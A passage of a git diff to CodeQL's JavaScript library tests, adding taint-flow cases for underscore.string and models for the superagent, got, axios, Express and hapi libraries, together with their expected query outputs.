sink(s.pred(source("s12"))); // $ hasTaintFlow=s12 + sink(s.succ(source("s13"))); // $ hasTaintFlow=s13 + sink(s.titleize(source("s14"))); // $ hasTaintFlow=s14 + sink(s.camelize(source("s15"))); // $ hasTaintFlow=s15 + sink(s.classify(source("s16"))); // $ hasTaintFlow=s16 + sink(s.underscored(source("s17"))); // $ hasTaintFlow=s17 + sink(s.dasherize(source("s18"))); // $ hasTaintFlow=s18 + sink(s.humanize(source("s19"))); // $ hasTaintFlow=s19 + sink(s.trim(source("s20"),"charsToStrim")); // $ hasTaintFlow=s20 + sink(s.ltrim(source("s21"),"charsToStrim")); // $ hasTaintFlow=s21 + sink(s.rtrim(source("s22"),"charsToStrim")); // $ hasTaintFlow=s22 + sink(s.truncate(source("s23"), 10)); // $ hasTaintFlow=s23 + sink(s.sprintf(source("s24"), 1.17)); // $ hasTaintFlow=s24 + sink(s.strRight(source("s25"), "pattern")); // $ hasTaintFlow=s25 + sink(s.strRightBack(source("s26"), "pattern")); // $ hasTaintFlow=s26 + sink(s.strLeft(source("s27"), "pattern")); // $ hasTaintFlow=s27 + sink(s.strLeftBack(source("s28"), "pattern")); // $ hasTaintFlow=s28 + sink(s.stripTags(source("s29"))); // $ hasTaintFlow=s29 + sink(s.unquote(source("s30"), "quote")); // $ hasTaintFlow=s30 + sink(s.map(source("s31"), (x) => {return x;})); // $ hasTaintFlow=s31 + sink(s.strip(source("s32"),"charsToStrim")); // $ hasTaintFlow=s32 + sink(s.lstrip(source("s33"),"charsToStrim")); // $ hasTaintFlow=s33 + sink(s.rstrip(source("s34"),"charsToStrim")); // $ hasTaintFlow=s34 + sink(s.camelcase(source("s35"))); // $ hasTaintFlow=s35 +} + +function strToArray() { + sink(s.chop(source("s1"), 3)); // $ MISSING: hasTaintFlow=s1 + sink(s.chars(source("s2"))[0]); // $ hasTaintFlow=s2 + sink(s.words(source("s3"))[0]); // $ hasTaintFlow=s3 + sink(s.lines(source("s7"))[0]); // $ hasTaintFlow=s7 + sink(s.chop(source("s1"), 3).length); +} + +function arrayToStr() { + sink(s.toSentence([source("s1")])); // $ hasTaintFlow=s1 + sink(s.toSentenceSerial([source("s2")])); // $ hasTaintFlow=s2 +} + +function multiSource() { + sink(s.insert("str", 4, source("s1"))); // $ hasTaintFlow=s1 + sink(s.insert(source("s2"), 4, "")); // $ hasTaintFlow=s2 + + sink(s.replaceAll("astr", "a", source("s3"))); // $ hasTaintFlow=s3 + sink(s.replaceAll(source("s4"), "a", "")); // $ hasTaintFlow=s4 + + sink(s.join(",", source("s5"), "str")); // $ hasTaintFlow=s5 + sink(s.join(",", "str", source("s6"))); // $ hasTaintFlow=s6 + + sink(s.splice(source("s7"), 1, 2, "str")); // $ hasTaintFlow=s7 + sink(s.splice("str", 1, 2, source("s8"))); // $ hasTaintFlow=s8 + + sink(s.prune(source("s9"), 1, "additional")); // $ hasTaintFlow=s9 + sink(s.prune("base", 1, source("s10"))); // $ hasTaintFlow=s10 + + sink(s.pad(source("s11"), 10, "charsToPad", "right")); // $ hasTaintFlow=s11 + sink(s.pad("base", 10, source("s12"), "right")); // $ hasTaintFlow=s12 + + sink(s.lpad(source("s13"), 10, "charsToPad")); // $ hasTaintFlow=s13 + sink(s.lpad("base", 10, source("s14"))); // $ hasTaintFlow=s14 + + sink(s.rpad(source("s15"), 10, "charsToPad")); // $ hasTaintFlow=s15 + sink(s.rpad("base", 10, source("s16"))); // $ hasTaintFlow=s16 + + sink(s.repeat(source("s17"), 3, "seperator")); // $ hasTaintFlow=s17 + sink(s.repeat("base", 3, source("s18"))); // $ hasTaintFlow=s18 + + sink(s.surround(source("s19"), "wrap")); // $ hasTaintFlow=s19 + sink(s.surround("base", source("s20"))); // $ hasTaintFlow=s20 + + sink(s.quote(source("s21"), "quote")); // $ hasTaintFlow=s21 + sink(s.quote("base", source("s22"))); // $ hasTaintFlow=s22 + + sink(s.q(source("s23"), "quote")); // $ hasTaintFlow=s23 + sink(s.q("base", source("s24"))); // $ hasTaintFlow=s24 + + sink(s.rjust(source("s25"), 10, "charsToPad")); // $ hasTaintFlow=s25 + sink(s.rjust("base", 10, source("s26"))); // $ hasTaintFlow=s26 + + sink(s.ljust(source("s27"), 10, "charsToPad")); // $ hasTaintFlow=s27 + sink(s.ljust("base", 10, source("s28"))); // $ hasTaintFlow=s28 +} + +function chaining() { + sink(s(source("s1")) + .slugify().capitalize().decapitalize().clean().cleanDiacritics() + .swapCase().escapeHTML().unescapeHTML().wrap().dedent() + .reverse().pred().succ().titleize().camelize().classify() + .underscored().dasherize().humanize().trim().ltrim().rtrim() + .truncate().sprintf().strRight().strRightBack() + .strLeft().strLeftBack().stripTags().unquote().value()); // $ hasTaintFlow=s1 + + sink(s(source("s2")) + .insert(4, source("s3")).replaceAll("a", source("s4")) + .join(",", source("s5")).splice(1, 2, source("s6")) + .prune(1, source("s7")).pad(10, source("s8"), "right") + .lpad(10, source("s9")).rpad(10, source("s10")) + .repeat(3, source("s11")).surround(source("s12")) + .quote(source("s13")).value()); // $ hasTaintFlow=s2 hasTaintFlow=s3 hasTaintFlow=s4 hasTaintFlow=s5 hasTaintFlow=s6 hasTaintFlow=s7 hasTaintFlow=s8 hasTaintFlow=s9 hasTaintFlow=s10 hasTaintFlow=s11 hasTaintFlow=s12 hasTaintFlow=s13 + + sink(s(source("s14")).toUpperCase().toLowerCase().replace().slice(1).substring(1).substr(1).concat(source("s15")).split()); // $ hasTaintFlow=s14 hasTaintFlow=s15 + + sink(s(source("s16")) + .strip().lstrip().rstrip().camelcase() + .q(source("s17")).ljust(10, source("s18")) + .rjust(10, source("s19"))); // $ hasTaintFlow=s16 hasTaintFlow=s17 hasTaintFlow=s18 hasTaintFlow=s19 + + sink(s(source("s20")).tap(function(value) { + return value + source("s21"); + }).value()); // $ hasTaintFlow=s20 hasTaintFlow=s21 +} + +function mapTests(){ + sink(s.map(source("s1"), (x) => {return x + source("s2");})); // $ hasTaintFlow=s1 hasTaintFlow=s2 + s.map(source("s1"), (x) => { sink(x); return x;}); // $ hasTaintFlow=s1 +} diff --git a/javascript/ql/test/library-tests/TypeAnnotations/JSDoc/JSDocTypeAnnotations.expected b/javascript/ql/test/library-tests/TypeAnnotations/JSDoc/JSDocTypeAnnotations.expected index bacfb98cdc63..8ac3eea2be5f 100644 --- a/javascript/ql/test/library-tests/TypeAnnotations/JSDoc/JSDocTypeAnnotations.expected +++ b/javascript/ql/test/library-tests/TypeAnnotations/JSDoc/JSDocTypeAnnotations.expected @@ -5,6 +5,8 @@ test_isNumber test_QualifiedName | VarType | tst.js:9:13:9:19 | VarType | | boolean | tst.js:5:14:5:20 | boolean | +| foo | tst.js:4:12:4:14 | foo | +| foo.bar | tst.js:4:12:4:18 | foo.bar | | foo.bar.baz | tst.js:4:12:4:22 | foo.bar.baz | | number | tst.js:3:12:3:17 | number | | string | tst.js:2:12:2:17 | string | diff --git a/javascript/ql/test/library-tests/TypeScript/Types/printAst.expected b/javascript/ql/test/library-tests/TypeScript/Types/printAst.expected index df304b899bb0..04d6e6247ff0 100644 --- a/javascript/ql/test/library-tests/TypeScript/Types/printAst.expected +++ b/javascript/ql/test/library-tests/TypeScript/Types/printAst.expected @@ -2,9 +2,6 @@ nodes | badTypes.ts:5:1:5:29 | [InterfaceDeclaration,TypeDefinition] interfa ... is.B {} | semmle.label | [InterfaceDeclaration,TypeDefinition] interfa ... is.B {} | | badTypes.ts:5:1:5:29 | [InterfaceDeclaration,TypeDefinition] interfa ... is.B {} | semmle.order | 1 | | badTypes.ts:5:11:5:11 | [Identifier] A | semmle.label | [Identifier] A | -| badTypes.ts:5:21:5:24 | [ThisVarTypeAccess] this | semmle.label | [ThisVarTypeAccess] this | -| badTypes.ts:5:21:5:26 | [TypeAccess] this.B | semmle.label | [TypeAccess] this.B | -| badTypes.ts:5:26:5:26 | [Identifier] B | semmle.label | [Identifier] B | | badTypes.ts:6:1:6:24 | [TypeAliasDeclaration,TypeDefinition] type T ... ar.bar; | semmle.label | [TypeAliasDeclaration,TypeDefinition] type T ... ar.bar; | | badTypes.ts:6:1:6:24 | [TypeAliasDeclaration,TypeDefinition] type T ... ar.bar; | semmle.order | 2 | | badTypes.ts:6:6:6:6 | [Identifier] T | semmle.label | [Identifier] T | @@ -2171,12 +2168,6 @@ nodes edges | badTypes.ts:5:1:5:29 | [InterfaceDeclaration,TypeDefinition] interfa ... is.B {} | badTypes.ts:5:11:5:11 | [Identifier] A | semmle.label | 1 | | badTypes.ts:5:1:5:29 | [InterfaceDeclaration,TypeDefinition] interfa ... is.B {} | badTypes.ts:5:11:5:11 | [Identifier] A | semmle.order | 1 | -| badTypes.ts:5:1:5:29 | [InterfaceDeclaration,TypeDefinition] interfa ... is.B {} | badTypes.ts:5:21:5:26 | [TypeAccess] this.B | semmle.label | 2 | -| badTypes.ts:5:1:5:29 | [InterfaceDeclaration,TypeDefinition] interfa ... is.B {} | badTypes.ts:5:21:5:26 | [TypeAccess] this.B | semmle.order | 2 | -| badTypes.ts:5:21:5:26 | [TypeAccess] this.B | badTypes.ts:5:21:5:24 | [ThisVarTypeAccess] this | semmle.label | 1 | -| badTypes.ts:5:21:5:26 | [TypeAccess] this.B | badTypes.ts:5:21:5:24 | [ThisVarTypeAccess] this | semmle.order | 1 | -| badTypes.ts:5:21:5:26 | [TypeAccess] this.B | badTypes.ts:5:26:5:26 | [Identifier] B | semmle.label | 2 | -| badTypes.ts:5:21:5:26 | [TypeAccess] this.B | badTypes.ts:5:26:5:26 | [Identifier] B | semmle.order | 2 | | badTypes.ts:6:1:6:24 | [TypeAliasDeclaration,TypeDefinition] type T ... ar.bar; | badTypes.ts:6:6:6:6 | [Identifier] T | semmle.label | 1 | | badTypes.ts:6:1:6:24 | [TypeAliasDeclaration,TypeDefinition] type T ... ar.bar; | badTypes.ts:6:6:6:6 | [Identifier] T | semmle.order | 1 | | badTypes.ts:6:1:6:24 | [TypeAliasDeclaration,TypeDefinition] type T ... ar.bar; | badTypes.ts:6:10:6:23 | [TypeofTypeExpr] typeof var.bar | semmle.label | 2 | diff --git a/javascript/ql/test/library-tests/TypeScript/Types/tests.expected b/javascript/ql/test/library-tests/TypeScript/Types/tests.expected index 150ce1867248..b9e11cfa92f3 100644 --- a/javascript/ql/test/library-tests/TypeScript/Types/tests.expected +++ b/javascript/ql/test/library-tests/TypeScript/Types/tests.expected @@ -864,8 +864,6 @@ getTypeDefinitionType | type_definitions.ts:21:1:21:20 | type Alias = T[]; | Alias | getTypeExprType | badTypes.ts:5:11:5:11 | A | A | -| badTypes.ts:5:21:5:26 | this.B | any | -| badTypes.ts:5:26:5:26 | B | any | | badTypes.ts:6:6:6:6 | T | any | | badTypes.ts:6:10:6:23 | typeof var.bar | any | | badTypes.ts:6:17:6:19 | var | any | diff --git a/javascript/ql/test/library-tests/frameworks/ClientRequests/ClientRequests.expected b/javascript/ql/test/library-tests/frameworks/ClientRequests/ClientRequests.expected index 62a3b33c63fd..f787a7e60603 100644 --- a/javascript/ql/test/library-tests/frameworks/ClientRequests/ClientRequests.expected +++ b/javascript/ql/test/library-tests/frameworks/ClientRequests/ClientRequests.expected @@ -10,6 +10,9 @@ test_ClientRequest | puppeteer.ts:6:11:6:42 | page.go ... e.com') | | puppeteer.ts:8:5:8:61 | page.ad ... css" }) | | puppeteer.ts:18:30:18:50 | page.go ... estUrl) | +| superagent.js:4:5:4:26 | superag ... ', url) | +| superagent.js:5:5:5:23 | superagent.del(url) | +| superagent.js:6:5:6:32 | superag ... st(url) | | tst.js:11:5:11:16 | request(url) | | tst.js:13:5:13:20 | request.get(url) | | tst.js:15:5:15:23 | request.delete(url) | @@ -91,9 +94,26 @@ test_ClientRequest | tst.js:286:20:286:55 | new Web ... :8080') | | tst.js:296:5:299:6 | axios({ ... \\n }) | | tst.js:312:12:312:36 | fetchPo ... o/bar') | +| tst.js:319:5:319:26 | superag ... ', url) | +| tst.js:320:5:320:23 | superagent.del(url) | +| tst.js:321:5:321:32 | superag ... st(url) | +| tst.js:328:5:328:38 | got(und ... ptions) | +| tst.js:329:5:329:49 | got(und ... {url})) | +| tst.js:332:5:332:46 | got.ext ... ).get() | +| tst.js:334:5:334:25 | got.pag ... rl, {}) | +| tst.js:337:5:337:20 | jsonClient.get() | +| tst.js:340:5:340:21 | jsonClient2.get() | +| tst.js:344:5:344:37 | axios.p ... config) | +| tst.js:345:5:345:28 | axios.p ... , data) | +| tst.js:346:5:346:36 | axios.p ... config) | +| tst.js:347:5:347:30 | axios.p ... , data) | +| tst.js:348:5:348:38 | axios.p ... config) | +| tst.js:349:5:349:30 | axios.g ... url }) | +| tst.js:352:5:352:66 | axiosIn ... text"}) | test_getADataNode | axiosTest.js:12:5:17:6 | axios({ ... \\n }) | axiosTest.js:15:18:15:55 | { 'Cont ... json' } | | axiosTest.js:12:5:17:6 | axios({ ... \\n }) | axiosTest.js:16:15:16:35 | {x: 'te ... 'test'} | +| superagent.js:6:5:6:32 | superag ... st(url) | superagent.js:6:39:6:42 | data | | tst.js:53:5:53:23 | axios({data: data}) | tst.js:53:18:53:21 | data | | tst.js:57:5:57:39 | axios.p ... data2}) | tst.js:57:19:57:23 | data1 | | tst.js:57:5:57:39 | axios.p ... data2}) | tst.js:57:33:57:37 | data2 | @@ -132,6 +152,12 @@ test_getADataNode | tst.js:249:1:251:2 | form.su ... e();\\n}) | tst.js:247:24:247:68 | request ... o.png') | | tst.js:257:1:262:2 | form.su ... rs()\\n}) | tst.js:255:25:255:35 | 'new_value' | | tst.js:286:20:286:55 | new Web ... :8080') | tst.js:288:21:288:35 | 'Hello Server!' | +| tst.js:321:5:321:32 | superag ... st(url) | tst.js:321:39:321:42 | data | +| tst.js:344:5:344:37 | axios.p ... config) | tst.js:344:25:344:28 | data | +| tst.js:345:5:345:28 | axios.p ... , data) | tst.js:345:24:345:27 | data | +| tst.js:346:5:346:36 | axios.p ... config) | tst.js:346:24:346:27 | data | +| tst.js:347:5:347:30 | axios.p ... , data) | tst.js:347:26:347:29 | data | +| tst.js:348:5:348:38 | axios.p ... config) | tst.js:348:26:348:29 | data | test_getHost | tst.js:87:5:87:39 | http.ge ... host}) | tst.js:87:34:87:37 | host | | tst.js:89:5:89:23 | axios({host: host}) | tst.js:89:18:89:21 | host | @@ -154,6 +180,9 @@ test_getUrl | puppeteer.ts:6:11:6:42 | page.go ... e.com') | puppeteer.ts:6:21:6:41 | 'https: ... le.com' | | puppeteer.ts:8:5:8:61 | page.ad ... css" }) | puppeteer.ts:8:29:8:58 | "http:/ ... le.css" | | puppeteer.ts:18:30:18:50 | page.go ... estUrl) | puppeteer.ts:18:40:18:49 | requestUrl | +| superagent.js:4:5:4:26 | superag ... ', url) | superagent.js:4:23:4:25 | url | +| superagent.js:5:5:5:23 | superagent.del(url) | superagent.js:5:20:5:22 | url | +| superagent.js:6:5:6:32 | superag ... st(url) | superagent.js:6:29:6:31 | url | | tst.js:11:5:11:16 | request(url) | tst.js:11:13:11:15 | url | | tst.js:13:5:13:20 | request.get(url) | tst.js:13:17:13:19 | url | | tst.js:15:5:15:23 | request.delete(url) | tst.js:15:20:15:22 | url | @@ -240,9 +269,31 @@ test_getUrl | tst.js:296:5:299:6 | axios({ ... \\n }) | tst.js:296:11:299:5 | {\\n ... ,\\n } | | tst.js:296:5:299:6 | axios({ ... \\n }) | tst.js:298:14:298:44 | "http:/ ... -axios" | | tst.js:312:12:312:36 | fetchPo ... o/bar') | tst.js:312:26:312:35 | '/foo/bar' | +| tst.js:319:5:319:26 | superag ... ', url) | tst.js:319:23:319:25 | url | +| tst.js:320:5:320:23 | superagent.del(url) | tst.js:320:20:320:22 | url | +| tst.js:321:5:321:32 | superag ... st(url) | tst.js:321:29:321:31 | url | +| tst.js:328:5:328:38 | got(und ... ptions) | tst.js:327:34:327:36 | url | +| tst.js:328:5:328:38 | got(und ... ptions) | tst.js:328:9:328:17 | undefined | +| tst.js:329:5:329:49 | got(und ... {url})) | tst.js:329:9:329:17 | undefined | +| tst.js:329:5:329:49 | got(und ... {url})) | tst.js:329:44:329:46 | url | +| tst.js:334:5:334:25 | got.pag ... rl, {}) | tst.js:334:18:334:20 | url | +| tst.js:337:5:337:20 | jsonClient.get() | tst.js:336:41:336:43 | url | +| tst.js:340:5:340:21 | jsonClient2.get() | tst.js:339:42:339:44 | url | +| tst.js:340:5:340:21 | jsonClient2.get() | tst.js:339:61:339:63 | url | +| tst.js:344:5:344:37 | axios.p ... config) | tst.js:344:20:344:22 | url | +| tst.js:345:5:345:28 | axios.p ... , data) | tst.js:345:19:345:21 | url | +| tst.js:346:5:346:36 | axios.p ... config) | tst.js:346:19:346:21 | url | +| tst.js:347:5:347:30 | axios.p ... , data) | tst.js:347:21:347:23 | url | +| tst.js:348:5:348:38 | axios.p ... config) | tst.js:348:21:348:23 | url | +| tst.js:349:5:349:30 | axios.g ... url }) | tst.js:349:18:349:29 | { url: url } | +| tst.js:352:5:352:66 | axiosIn ... text"}) | tst.js:352:19:352:65 | {method ... "text"} | +| tst.js:352:5:352:66 | axiosIn ... text"}) | tst.js:352:40:352:42 | url | test_getAResponseDataNode | axiosTest.js:4:5:7:6 | axios({ ... \\n }) | axiosTest.js:4:5:7:6 | axios({ ... \\n }) | json | true | | axiosTest.js:12:5:17:6 | axios({ ... \\n }) | axiosTest.js:12:5:17:6 | axios({ ... \\n }) | json | true | +| superagent.js:4:5:4:26 | superag ... ', url) | superagent.js:4:5:4:26 | superag ... ', url) | stream | true | +| superagent.js:5:5:5:23 | superagent.del(url) | superagent.js:5:5:5:23 | superagent.del(url) | stream | true | +| superagent.js:6:5:6:32 | superag ... st(url) | superagent.js:6:5:6:32 | superag ... st(url) | stream | true | | tst.js:19:5:19:23 | requestPromise(url) | tst.js:19:5:19:23 | requestPromise(url) | text | true | | tst.js:21:5:21:23 | superagent.get(url) | tst.js:21:5:21:23 | superagent.get(url) | stream | true | | tst.js:25:5:25:14 | axios(url) | tst.js:25:5:25:14 | axios(url) | | true | @@ -314,3 +365,19 @@ test_getAResponseDataNode | tst.js:296:5:299:6 | axios({ ... \\n }) | tst.js:303:26:303:37 | err.response | json | false | | tst.js:296:5:299:6 | axios({ ... \\n }) | tst.js:304:27:304:38 | err.response | json | false | | tst.js:312:12:312:36 | fetchPo ... o/bar') | tst.js:312:12:312:36 | fetchPo ... o/bar') | fetch.response | true | +| tst.js:319:5:319:26 | superag ... ', url) | tst.js:319:5:319:26 | superag ... ', url) | stream | true | +| tst.js:320:5:320:23 | superagent.del(url) | tst.js:320:5:320:23 | superagent.del(url) | stream | true | +| tst.js:321:5:321:32 | superag ... st(url) | tst.js:321:5:321:32 | superag ... st(url) | stream | true | +| tst.js:328:5:328:38 | got(und ... ptions) | tst.js:328:5:328:38 | got(und ... ptions) | text | true | +| tst.js:329:5:329:49 | got(und ... {url})) | tst.js:329:5:329:49 | got(und ... {url})) | text | true | +| tst.js:332:5:332:46 | got.ext ... ).get() | tst.js:332:5:332:46 | got.ext ... ).get() | text | true | +| tst.js:334:5:334:25 | got.pag ... rl, {}) | tst.js:334:5:334:25 | got.pag ... rl, {}) | text | true | +| tst.js:337:5:337:20 | jsonClient.get() | tst.js:337:5:337:20 | jsonClient.get() | text | true | +| tst.js:340:5:340:21 | jsonClient2.get() | tst.js:340:5:340:21 | jsonClient2.get() | text | true | +| tst.js:344:5:344:37 | axios.p ... config) | tst.js:344:5:344:37 | axios.p ... config) | json | true | +| tst.js:345:5:345:28 | axios.p ... , data) | tst.js:345:5:345:28 | axios.p ... , data) | json | true | +| tst.js:346:5:346:36 | axios.p ... config) | tst.js:346:5:346:36 | axios.p ... config) | json | true | +| tst.js:347:5:347:30 | axios.p ... , data) | tst.js:347:5:347:30 | axios.p ... , data) | json | true | +| tst.js:348:5:348:38 | axios.p ... config) | tst.js:348:5:348:38 | axios.p ... config) | json | true | +| tst.js:349:5:349:30 | axios.g ... url }) | tst.js:349:5:349:30 | axios.g ... url }) | json | true | +| tst.js:352:5:352:66 | axiosIn ... text"}) | tst.js:352:5:352:66 | axiosIn ... text"}) | text | true | diff --git a/javascript/ql/test/library-tests/frameworks/ClientRequests/superagent.js b/javascript/ql/test/library-tests/frameworks/ClientRequests/superagent.js new file mode 100644 index 000000000000..b96c4fa45df8 --- /dev/null +++ b/javascript/ql/test/library-tests/frameworks/ClientRequests/superagent.js @@ -0,0 +1,7 @@ +import { superagent } from "./superagentWrapper.js"; + +function test(url) { + superagent('GET', url); + superagent.del(url); + superagent.agent().post(url).send(data); +} diff --git a/javascript/ql/test/library-tests/frameworks/ClientRequests/superagentWrapper.js b/javascript/ql/test/library-tests/frameworks/ClientRequests/superagentWrapper.js new file mode 100644 index 000000000000..58c47db2fffc --- /dev/null +++ b/javascript/ql/test/library-tests/frameworks/ClientRequests/superagentWrapper.js @@ -0,0 +1,2 @@ +import superagent from 'superagent'; +export { superagent } diff --git a/javascript/ql/test/library-tests/frameworks/ClientRequests/tst.js b/javascript/ql/test/library-tests/frameworks/ClientRequests/tst.js index b2b9d8256ca3..3cd086fae0e7 100644 --- a/javascript/ql/test/library-tests/frameworks/ClientRequests/tst.js +++ b/javascript/ql/test/library-tests/frameworks/ClientRequests/tst.js @@ -314,3 +314,40 @@ function usePolyfill() { return response.text() }) } + +function useSuperagent(url){ + superagent('GET', url); + superagent.del(url); + superagent.agent().post(url).send(data); +} + +import { Options } from 'got'; + +function gotTests(url){ + const options = new Options({url}); + got(undefined, undefined, options); + got(undefined, undefined, new Options({url})); + + const options2 = new Options({url}); + got.extend(options2).extend(options).get(); + + got.paginate(url, {}); + + const jsonClient = got.extend({url: url}); + jsonClient.get(); + + const jsonClient2 = got.extend({url: url}).extend({url: url}); + jsonClient2.get(); +} + +function moreAxiosTests(url, data, config){ + axios.postForm(url, data, config); + axios.putForm(url, data); + axios.putForm(url, data, config); + axios.patchForm(url, data); + axios.patchForm(url, data, config); + axios.getUri({ url: url }); + + const axiosInstance = axios.create({}); + axiosInstance({method: "get", url: url, responseType: "text"}); +} diff --git a/javascript/ql/test/library-tests/frameworks/HTTP/RemoteRequestInput.expected b/javascript/ql/test/library-tests/frameworks/HTTP/RemoteRequestInput.expected index e6c285607c49..9ab5354181e9 100644 --- a/javascript/ql/test/library-tests/frameworks/HTTP/RemoteRequestInput.expected +++ b/javascript/ql/test/library-tests/frameworks/HTTP/RemoteRequestInput.expected @@ -1,5 +1,7 @@ | connect.js:6:5:6:11 | req.url | url | | connect.js:7:5:7:21 | req.cookies.get() | cookie | +| express-typed.ts:4:5:4:12 | req.body | body | +| express-typed.ts:10:5:10:12 | req.body | body | | express.js:12:5:12:19 | req.param("p1") | parameter | | express.js:13:5:13:17 | req.params.p2 | parameter | | express.js:14:5:14:16 | req.query.p3 | parameter | diff --git a/javascript/ql/test/library-tests/frameworks/HTTP/express-typed.ts b/javascript/ql/test/library-tests/frameworks/HTTP/express-typed.ts new file mode 100644 index 000000000000..c6b994f03044 --- /dev/null +++ b/javascript/ql/test/library-tests/frameworks/HTTP/express-typed.ts @@ -0,0 +1,11 @@ +import { Request } from "express"; + +export function f1(req: Request) { + req.body; +} + +type Alias = Request & { foo: string }; + +export function f2(req: Alias) { + req.body; +} diff --git a/javascript/ql/test/library-tests/frameworks/data/guardedRouteHandler.js b/javascript/ql/test/library-tests/frameworks/data/guardedRouteHandler.js new file mode 100644 index 000000000000..972b8b9f1119 --- /dev/null +++ b/javascript/ql/test/library-tests/frameworks/data/guardedRouteHandler.js @@ -0,0 +1,21 @@ +const express = require('express'); +const app = express(); +const testlib = require('testlib'); + +app.get('/before', (req, res) => { + sink(req.injectedReqData); // OK [INCONSISTENCY] - happens before middleware + sink(req.injectedResData); // OK - wrong parameter + + sink(res.injectedReqData); // OK - wrong parameter + sink(res.injectedResData); // OK [INCONSISTENCY] - happens before middleware +}); + +app.use(testlib.middleware()); + +app.get('/after', (req, res) => { + sink(req.injectedReqData); // NOT OK + sink(req.injectedResData); // OK - wrong parameter + + sink(res.injectedReqData); // OK - wrong parameter + sink(res.injectedResData); // NOT OK +}); diff --git a/javascript/ql/test/library-tests/frameworks/data/test.expected b/javascript/ql/test/library-tests/frameworks/data/test.expected index 70fc4b00eab5..0bc1b6b6ee07 100644 --- a/javascript/ql/test/library-tests/frameworks/data/test.expected +++ b/javascript/ql/test/library-tests/frameworks/data/test.expected @@ -1,6 +1,10 @@ legacyDataFlowDifference consistencyIssue taintFlow +| guardedRouteHandler.js:6:10:6:28 | req.injectedReqData | guardedRouteHandler.js:6:10:6:28 | req.injectedReqData | +| guardedRouteHandler.js:10:10:10:28 | res.injectedResData | guardedRouteHandler.js:10:10:10:28 | res.injectedResData | +| guardedRouteHandler.js:16:10:16:28 | req.injectedReqData | guardedRouteHandler.js:16:10:16:28 | req.injectedReqData | +| guardedRouteHandler.js:20:10:20:28 | res.injectedResData | guardedRouteHandler.js:20:10:20:28 | res.injectedResData | | paramDecorator.ts:6:54:6:54 | x | paramDecorator.ts:7:10:7:10 | x | | test.js:5:30:5:37 | source() | test.js:5:8:5:38 | testlib ... urce()) | | test.js:6:22:6:29 | source() | test.js:6:8:6:30 | preserv ... urce()) | @@ -81,6 +85,10 @@ taintFlow | test.js:272:6:272:40 | new MyS ... ource() | test.js:272:6:272:40 | new MyS ... ource() | | test.js:274:6:274:39 | testlib ... eName() | test.js:274:6:274:39 | testlib ... eName() | | test.js:277:8:277:31 | "danger ... .danger | test.js:277:8:277:31 | "danger ... .danger | +| test.js:284:8:284:16 | source[0] | test.js:284:8:284:16 | source[0] | +| test.js:285:8:285:19 | source.pop() | test.js:285:8:285:19 | source.pop() | +| test.js:286:18:286:18 | e | test.js:286:28:286:28 | e | +| test.js:287:14:287:14 | e | test.js:287:24:287:24 | e | isSink | test.js:54:18:54:25 | source() | test-sink | | test.js:55:22:55:29 | source() | test-sink | diff --git a/javascript/ql/test/library-tests/frameworks/data/test.ext.yml b/javascript/ql/test/library-tests/frameworks/data/test.ext.yml index eed5c054fbfe..1ac621936a4a 100644 --- a/javascript/ql/test/library-tests/frameworks/data/test.ext.yml +++ b/javascript/ql/test/library-tests/frameworks/data/test.ext.yml @@ -10,8 +10,11 @@ extensions: - ['testlib', 'Member[MethodDecorator].DecoratedMember.Parameter[0]', 'test-source'] - ['testlib', 'Member[ParamDecoratorSource].DecoratedParameter', 'test-source'] - ['testlib', 'Member[getSource].ReturnValue', 'test-source'] + - ['testlib', 'Member[getSourceArray].ReturnValue.ArrayElement', 'test-source'] - ['(testlib)', 'Member[parenthesizedPackageName].ReturnValue', 'test-source'] - ['danger-constant', 'Member[danger]', 'test-source'] + - ['testlib', 'Member[middleware].ReturnValue.GuardedRouteHandler.Parameter[0].Member[injectedReqData]', 'test-source'] + - ['testlib', 'Member[middleware].ReturnValue.GuardedRouteHandler.Parameter[1].Member[injectedResData]', 'test-source'] - addsTo: pack: codeql/javascript-all diff --git a/javascript/ql/test/library-tests/frameworks/data/test.js b/javascript/ql/test/library-tests/frameworks/data/test.js index 71fd64e10f64..a67c4244bdfa 100644 --- a/javascript/ql/test/library-tests/frameworks/data/test.js +++ b/javascript/ql/test/library-tests/frameworks/data/test.js @@ -278,3 +278,11 @@ function dangerConstant() { sink("danger-constant".safe); // OK sink("danger-constant"); // OK } + +function arraySource() { + const source = testlib.getSourceArray(); + sink(source[0]); // NOT OK + sink(source.pop()); // NOT OK + source.forEach(e => sink(e)); // NOT OK + source.map(e => sink(e)); // NOT OK +} diff --git a/javascript/ql/test/library-tests/frameworks/hapi/src/hapihapi.js b/javascript/ql/test/library-tests/frameworks/hapi/src/hapihapi.js new file mode 100644 index 000000000000..45706b7a9405 --- /dev/null +++ b/javascript/ql/test/library-tests/frameworks/hapi/src/hapihapi.js @@ -0,0 +1,36 @@ +var server1 = new (require('@hapi/hapi')).Server(); // HTTP::Server + +var Hapi = require('@hapi/hapi'); +var server2 = new Hapi.Server(); // HTTP::Server + +function handler1(){} // HTTP::RouteHandler +server2.route({ + handler: handler1 +}); + + +server2.route({ + handler: function handler2(request, reply){ // HTTP::RouteHandler + request.response.header('HEADER1', '') // HTTP::HeaderDefinition + }}); + +server2.ext('onPreResponse', function handler3(request, reply) { // HTTP::RouteHandler +}) + +function handler4(request, reply){ + request.rawPayload; + request.payload.foo; + request.query.bar; + request.url.path; + request.headers.baz; + request.state.token; +} +var route = {handler: handler4}; +server2.route(route); + +server2.cache({ segment: 'countries', expiresIn: 60*60*1000 }); + +function getHandler() { + return function (req, h){} +} +server2.route({handler: getHandler()}); diff --git a/javascript/ql/test/library-tests/frameworks/hapi/tests.expected b/javascript/ql/test/library-tests/frameworks/hapi/tests.expected index 4c752ee56a85..730bae77bf93 100644 --- a/javascript/ql/test/library-tests/frameworks/hapi/tests.expected +++ b/javascript/ql/test/library-tests/frameworks/hapi/tests.expected @@ -9,6 +9,11 @@ test_RouteSetup | src/hapiglue.js:17:1:18:2 | server2 ... dler\\n}) | | src/hapiglue.js:31:1:31:20 | server2.route(route) | | src/hapiglue.js:38:1:38:38 | server2 ... ler()}) | +| src/hapihapi.js:7:1:9:2 | server2 ... ler1\\n}) | +| src/hapihapi.js:12:1:15:7 | server2 ... }}) | +| src/hapihapi.js:17:1:18:2 | server2 ... dler\\n}) | +| src/hapihapi.js:29:1:29:20 | server2.route(route) | +| src/hapihapi.js:36:1:36:38 | server2 ... ler()}) | test_RequestExpr | src/hapi.js:13:32:13:38 | request | src/hapi.js:13:14:15:5 | functio ... n\\n } | | src/hapi.js:13:32:13:38 | request | src/hapi.js:13:14:15:5 | functio ... n\\n } | @@ -38,12 +43,27 @@ test_RequestExpr | src/hapiglue.js:27:3:27:9 | request | src/hapiglue.js:20:1:29:1 | functio ... oken;\\n} 